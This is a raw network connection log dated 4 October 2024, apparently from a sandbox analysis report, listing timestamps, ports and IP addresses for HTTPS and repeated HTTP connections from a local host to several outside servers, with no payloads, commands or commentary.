                                                                                                                                                    Oct 4, 2024 11:57:20.893659115 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.893696070 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.893925905 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.894880056 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.895051956 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.895088911 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.895277977 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.896228075 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.896394968 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.896434069 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.896646023 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.897613049 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.897828102 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.897866964 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.898125887 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.898977995 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.899184942 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.899224043 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.899426937 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.900440931 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.900698900 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.900736094 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.901000977 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.901649952 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.901818991 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.901856899 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.901916981 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.902053118 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.902101040 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.902127981 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:02.960813046 CEST4973280192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 11:58:03.143460989 CEST804973291.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:03.143707037 CEST4973280192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 11:58:03.145682096 CEST4973280192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 11:58:03.329385042 CEST804973291.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:03.329452991 CEST804973291.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:03.329694986 CEST4973280192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 11:58:03.333314896 CEST4973280192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 11:58:03.515383959 CEST804973291.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:18.520044088 CEST4973380192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:18.717586994 CEST8049733185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:18.717860937 CEST4973380192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:18.719450951 CEST4973380192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:18.916760921 CEST8049733185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:18.916870117 CEST8049733185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:18.916934013 CEST8049733185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:18.917233944 CEST4973380192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:20.221435070 CEST4973380192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:21.238589048 CEST4973480192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:21.431366920 CEST8049734185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:21.431519985 CEST4973480192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:21.432881117 CEST4973480192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:21.626135111 CEST8049734185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:21.626240015 CEST8049734185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:21.626307011 CEST8049734185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:21.626476049 CEST4973480192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:22.939546108 CEST4973480192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:23.956821918 CEST4973580192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:24.150434971 CEST8049735185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:24.150743961 CEST4973580192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:24.152307987 CEST4973580192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:24.345792055 CEST8049735185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:24.345891953 CEST8049735185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:24.345967054 CEST8049735185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:24.346023083 CEST8049735185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:24.346414089 CEST8049735185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:24.346503973 CEST8049735185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:24.346707106 CEST4973580192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:25.657761097 CEST4973580192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:26.675025940 CEST4973680192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:26.868309975 CEST8049736185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:26.868638992 CEST4973680192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:26.870014906 CEST4973680192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:27.063411951 CEST8049736185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:27.063532114 CEST8049736185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:27.063607931 CEST8049736185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:27.063683987 CEST8049736185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:27.063757896 CEST8049736185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:27.063819885 CEST8049736185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:27.063852072 CEST4973680192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:27.064045906 CEST4973680192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:27.067271948 CEST4973680192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:27.260307074 CEST8049736185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:32.289547920 CEST4973780192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:32.390136957 CEST8049737184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:32.390367985 CEST4973780192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:32.391753912 CEST4973780192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:32.492080927 CEST8049737184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:32.494491100 CEST8049737184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:32.494594097 CEST8049737184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:32.494687080 CEST8049737184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:32.494750977 CEST4973780192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:32.494780064 CEST8049737184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:32.494930029 CEST8049737184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:32.494992018 CEST8049737184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:32.495008945 CEST4973780192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:32.495083094 CEST8049737184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:32.495146990 CEST8049737184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:32.495162964 CEST4973780192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:32.495232105 CEST8049737184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:32.495301008 CEST8049737184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:32.495304108 CEST4973780192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:32.495500088 CEST4973780192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:33.905963898 CEST4973780192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:34.923208952 CEST4973880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:35.024451017 CEST8049738184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:35.024619102 CEST4973880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:35.026010036 CEST4973880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:35.127758026 CEST8049738184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:35.129125118 CEST8049738184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:35.129241943 CEST8049738184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:35.129334927 CEST8049738184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:35.129436016 CEST8049738184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:35.129446983 CEST4973880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:35.129534960 CEST8049738184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:35.129595041 CEST8049738184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:35.129612923 CEST4973880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:35.129679918 CEST8049738184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:35.129736900 CEST8049738184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:35.129754066 CEST4973880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:35.129818916 CEST8049738184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:35.129880905 CEST8049738184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:35.129897118 CEST4973880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:35.130059004 CEST4973880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:36.530394077 CEST4973880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:37.547770977 CEST4973980192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:37.648303986 CEST8049739184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:37.648530960 CEST4973980192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:37.650074005 CEST4973980192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:37.750910044 CEST8049739184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:37.751023054 CEST8049739184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:37.751107931 CEST8049739184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:37.751159906 CEST8049739184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:37.751208067 CEST8049739184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:37.751256943 CEST8049739184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:37.752475023 CEST8049739184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:37.752609015 CEST8049739184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:37.752722025 CEST8049739184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:37.752767086 CEST4973980192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:37.752875090 CEST8049739184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:37.752975941 CEST8049739184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:37.753082991 CEST8049739184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:37.753101110 CEST4973980192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:37.753196001 CEST8049739184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:37.753251076 CEST4973980192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:37.753288984 CEST8049739184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:37.753356934 CEST8049739184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:37.753426075 CEST8049739184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:37.753447056 CEST4973980192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:37.753659010 CEST4973980192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:39.154822111 CEST4973980192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:40.171996117 CEST4974080192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:40.275892019 CEST8049740184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:40.276146889 CEST4974080192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:40.277545929 CEST4974080192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:40.380876064 CEST8049740184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:40.381834984 CEST8049740184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:40.381932974 CEST8049740184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:40.382004023 CEST8049740184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:40.382069111 CEST8049740184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:40.382134914 CEST8049740184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:40.382195950 CEST4974080192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:40.382195950 CEST4974080192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:40.382222891 CEST8049740184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:40.382335901 CEST8049740184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:40.382411957 CEST8049740184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:40.382455111 CEST4974080192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:40.382512093 CEST8049740184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:40.382601976 CEST8049740184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:40.382637978 CEST4974080192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:40.382936954 CEST4974080192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:40.384912014 CEST4974080192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:40.485296965 CEST8049740184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:45.573937893 CEST4974180192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:45.758481026 CEST8049741199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:45.758827925 CEST4974180192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:45.760219097 CEST4974180192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:45.945580006 CEST8049741199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:45.962210894 CEST8049741199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:45.962313890 CEST8049741199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:45.962435961 CEST8049741199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:45.962517977 CEST8049741199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:45.962580919 CEST8049741199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:45.962656021 CEST8049741199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:45.962685108 CEST4974180192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:45.962738037 CEST8049741199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:45.962800026 CEST8049741199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:45.962852955 CEST4974180192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:45.962857962 CEST8049741199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:45.962919950 CEST8049741199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:45.963037014 CEST4974180192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:45.963191986 CEST4974180192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:46.146996975 CEST8049741199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:46.147104979 CEST8049741199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:46.147186041 CEST8049741199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:46.147274971 CEST4974180192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:46.147557020 CEST4974180192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:47.262500048 CEST4974180192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:48.279791117 CEST4974280192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:48.464358091 CEST8049742199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:48.464550018 CEST4974280192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:48.466025114 CEST4974280192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:48.650927067 CEST8049742199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:48.664613962 CEST8049742199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:48.664714098 CEST8049742199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:48.664840937 CEST8049742199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:48.664927959 CEST4974280192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:48.664937019 CEST8049742199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:48.665014029 CEST8049742199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:48.665107012 CEST8049742199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:48.665175915 CEST8049742199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:48.665241957 CEST8049742199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:48.665266991 CEST4974280192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:48.665309906 CEST8049742199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:48.665376902 CEST8049742199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:48.665457010 CEST4974280192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:48.665457010 CEST4974280192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:48.665610075 CEST4974280192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:48.849589109 CEST8049742199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:48.849695921 CEST8049742199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:48.849776030 CEST8049742199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:48.850131035 CEST4974280192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:48.850131035 CEST4974280192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:49.980597019 CEST4974280192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:50.997796059 CEST4974380192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:51.185817957 CEST8049743199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:51.185977936 CEST4974380192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:51.187577009 CEST4974380192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:51.376705885 CEST8049743199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:51.376812935 CEST8049743199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:51.376889944 CEST8049743199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:51.398381948 CEST8049743199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:51.398509026 CEST8049743199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:51.398605108 CEST8049743199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:51.398682117 CEST8049743199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:51.398782015 CEST8049743199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:51.398863077 CEST4974380192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:51.398890018 CEST8049743199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:51.398994923 CEST8049743199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:51.399025917 CEST4974380192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:51.399096012 CEST8049743199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:51.399164915 CEST8049743199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:51.399194002 CEST4974380192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:51.399382114 CEST8049743199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:51.399535894 CEST4974380192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:51.399535894 CEST4974380192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:51.584820986 CEST8049743199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:51.584867954 CEST8049743199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:51.584901094 CEST8049743199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:51.585223913 CEST4974380192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:52.698544025 CEST4974380192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:53.715938091 CEST4974480192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:53.900755882 CEST8049744199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:53.900969982 CEST4974480192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:53.902379036 CEST4974480192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:54.087115049 CEST8049744199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:54.103954077 CEST8049744199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:54.104049921 CEST8049744199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:54.104196072 CEST8049744199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:54.104330063 CEST8049744199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:54.104345083 CEST8049744199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:54.104418039 CEST4974480192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:54.104460955 CEST8049744199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:54.104475021 CEST8049744199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:54.104577065 CEST4974480192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:54.104660034 CEST8049744199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:54.104732037 CEST4974480192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:54.104772091 CEST8049744199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:54.104818106 CEST8049744199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:54.104917049 CEST4974480192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:54.105097055 CEST4974480192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:54.289161921 CEST8049744199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:54.289282084 CEST8049744199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:54.289391994 CEST8049744199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:54.289603949 CEST4974480192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:54.289603949 CEST4974480192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:54.292737961 CEST4974480192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 11:58:54.478301048 CEST8049744199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:59.533521891 CEST4974580192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:58:59.635406017 CEST804974513.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:59.635586977 CEST4974580192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:58:59.637206078 CEST4974580192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:58:59.738305092 CEST804974513.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:59.738904953 CEST804974513.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:59.739043951 CEST4974580192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:01.149876118 CEST4974580192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:01.250967979 CEST804974513.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:02.167201996 CEST4974680192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:02.268579006 CEST804974613.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:02.268847942 CEST4974680192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:02.270221949 CEST4974680192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:02.370692968 CEST804974613.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:02.370898008 CEST804974613.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:02.371082067 CEST4974680192.168.11.2013.248.169.48
